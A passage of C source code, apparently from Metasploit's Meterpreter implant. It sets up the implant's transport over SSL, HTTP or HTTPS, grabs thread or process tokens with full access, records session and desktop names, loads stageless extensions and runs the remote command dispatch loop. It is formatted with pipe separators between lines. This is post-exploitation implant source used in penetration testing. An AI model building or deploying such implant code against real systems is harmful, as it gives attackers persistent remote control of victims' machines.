if (res != ERROR_SUCCESS)
|
|
{
|
|
dprintf("[SERVER] Failed to get TCP communications running: %u (%x)", res, res);
|
|
break;
|
|
}
|
|
}
|
|
else if (strcmp(global_meterpreter_transport + 12, "TRANSPORT_HTTPS") == 0)
|
|
{
|
|
pRemote->transport = METERPRETER_TRANSPORT_HTTPS;
|
|
dprintf("[SERVER] Using HTTPS transport...");
|
|
}
|
|
else if (strcmp(global_meterpreter_transport + 12, "TRANSPORT_HTTP") == 0)
|
|
{
|
|
pRemote->transport = METERPRETER_TRANSPORT_HTTP;
|
|
dprintf("[SERVER] Using HTTP transport...");
|
|
}
|
|
|
|
// Do not allow the file descriptor to be inherited by child processes
|
|
SetHandleInformation((HANDLE)pRemote->fd, HANDLE_FLAG_INHERIT, 0);
|
|
|
|
dprintf("[SERVER] Initializing tokens...");
|
|
|
|
// Store our thread handle
|
|
pRemote->hServerThread = serverThread->handle;
|
|
|
|
#ifdef _WIN32
|
|
// Store our process token
|
|
if (!OpenThreadToken(pRemote->hServerThread, TOKEN_ALL_ACCESS, TRUE, &pRemote->hServerToken))
|
|
{
|
|
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &pRemote->hServerToken);
|
|
}
|
|
|
|
// Copy it to the thread token
|
|
pRemote->hThreadToken = pRemote->hServerToken;
|
|
|
|
// Save the initial session/station/desktop names...
|
|
pRemote->dwOrigSessionId = server_sessionid();
|
|
pRemote->dwCurrentSessionId = pRemote->dwOrigSessionId;
|
|
GetUserObjectInformation(GetProcessWindowStation(), UOI_NAME, &cStationName, 256, NULL);
|
|
pRemote->cpOrigStationName = _strdup(cStationName);
|
|
pRemote->cpCurrentStationName = _strdup(cStationName);
|
|
GetUserObjectInformation(GetThreadDesktop(GetCurrentThreadId()), UOI_NAME, &cDesktopName, 256, NULL);
|
|
pRemote->cpOrigDesktopName = _strdup(cDesktopName);
|
|
pRemote->cpCurrentDesktopName = _strdup(cDesktopName);
|
|
#endif
|
|
|
|
// Process our default SSL-over-TCP transport
|
|
if (pRemote->transport == METERPRETER_TRANSPORT_SSL)
|
|
{
|
|
dprintf("[SERVER] Flushing the socket handle...");
|
|
server_socket_flush(pRemote);
|
|
|
|
dprintf("[SERVER] Initializing SSL...");
|
|
if (!server_initialize_ssl(pRemote))
|
|
{
|
|
break;
|
|
}
|
|
|
|
dprintf("[SERVER] Negotiating SSL...");
|
|
if (!server_negotiate_ssl(pRemote))
|
|
{
|
|
break;
|
|
}
|
|
|
|
dprintf("[SERVER] Registering dispatch routines...");
|
|
register_dispatch_routines();
|
|
|
|
if (bStageless)
|
|
{
|
|
// in the case of stageless payloads, fd contains a pointer to the extensions
|
|
// to load
|
|
dprintf("[SERVER] Loading stageless extensions");
|
|
load_stageless_extensions(pRemote, (ULONG_PTR)fd);
|
|
}
|
|
|
|
dprintf("[SERVER] Entering the main server dispatch loop for transport %d...", pRemote->transport);
|
|
server_dispatch(pRemote);
|
|
|
|
dprintf("[SERVER] Deregistering dispatch routines...");
|
|
deregister_dispatch_routines(pRemote);
|
|
}
|
|
|
|
if (pRemote->transport == METERPRETER_TRANSPORT_HTTP || pRemote->transport == METERPRETER_TRANSPORT_HTTPS)
|
|
{
|
|
dprintf("[SERVER] Registering dispatch routines...");
|
|
register_dispatch_routines();
|
|
|
|
if (bStageless)
|
|
{
|
|
// in the case of stageless payloads, fd contains a pointer to the extensions
|
|
// to load
|
|
dprintf("[SERVER] Loading stageless extensions");
|
|
load_stageless_extensions(pRemote, (ULONG_PTR)fd);
|
|
}
|
|
|
|
dprintf("[SERVER] Entering the main server dispatch loop for transport %d...", pRemote->transport);
|
|
#ifdef _WIN32
|
|
server_dispatch_http_wininet(pRemote);
|
|
#else
|
|
// XXX: Handle non-windows HTTP transport
|
|
#endif
|
|
|
|
dprintf("[SERVER] Deregistering dispatch routines...");
|
|
deregister_dispatch_routines(pRemote);
|
|
}
|
|
|
|
} while (0);
|
|
|
|
if (pRemote->transport == METERPRETER_TRANSPORT_SSL)
|
|
{
|
|
dprintf("[SERVER] Closing down SSL...");
|
|
server_destroy_ssl(pRemote);
|
|
}
|
|
|
|
if (pRemote)
|
|
{
|
|
remote_deallocate(pRemote);
|
|
}
|
|
}
|
|
__except (exceptionfilter(GetExceptionCode(), GetExceptionInformation()))
|
|
{
|
|
dprintf("[SERVER] *** exception triggered!");
|
|
|
|
thread_kill(serverThread);
|
|
}
|
|
|
|
dprintf("[SERVER] Finished.");
|
|
return res;
|
|
} |